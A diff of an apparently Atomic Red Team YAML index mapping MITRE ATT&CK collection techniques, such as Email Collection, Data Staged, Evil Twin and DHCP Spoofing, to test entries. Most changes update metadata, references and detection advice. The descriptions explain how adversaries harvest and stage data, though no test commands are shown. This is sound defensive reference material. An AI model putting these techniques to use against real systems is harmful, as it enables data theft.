       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests:
     - name: Input Capture
@@ -67046,7 +67519,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -67061,30 +67534,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -67093,13 +67546,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -67113,20 +67570,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -67169,7 +67643,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests:
     - name: using device audio capture commandlet
@@ -67218,7 +67691,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -67238,22 +67711,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -67270,11 +67745,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -67290,37 +67764,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -67332,22 +67797,41 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests:
     - name: Identify Documents on USB and Removable Media via PowerShell
@@ -67374,55 +67858,54 @@ collection:
           '
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests:
     - name: Stage data from Discovery.bat
@@ -67495,7 +67978,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -67519,8 +68002,6 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests:
     - name: Email Collection with PowerShell Get-Inbox
@@ -67565,7 +68046,7 @@ collection:
         name: powershell
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -67586,6 +68067,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -67609,8 +68091,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -67635,7 +68119,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests:
     - name: Automated Collection Command Prompt
@@ -67770,7 +68253,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests:
     - name: Utilize Clipboard to store or execute commands from
@@ -67844,7 +68326,7 @@ collection:
         name: powershell
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -67878,10 +68360,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -67892,13 +68376,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -67939,37 +68424,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -67980,23 +68439,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -68066,7 +68549,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests:
     - name: Search files of interest and save them to a single zip file (Windows)
@@ -68138,7 +68620,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -68157,10 +68639,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -68189,7 +68750,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
       description: "Adversaries may access network configuration files to collect
         sensitive data about the device and the network. The network configuration
@@ -68219,8 +68780,6 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1560:
     technique:
@@ -68274,7 +68833,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560
     atomic_tests:
     - name: Compress Data for Exfiltration With PowerShell
@@ -68335,7 +68893,7 @@ collection:
         description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
           Retrieved May 24, 2017.
         source_name: cobaltstrike manual
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-25T18:58:15.229Z'
       name: Browser Session Hijacking
       description: |-
         Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -68363,12 +68921,10 @@ collection:
       - Administrator
       - SYSTEM
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -68405,23 +68961,23 @@ collection:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
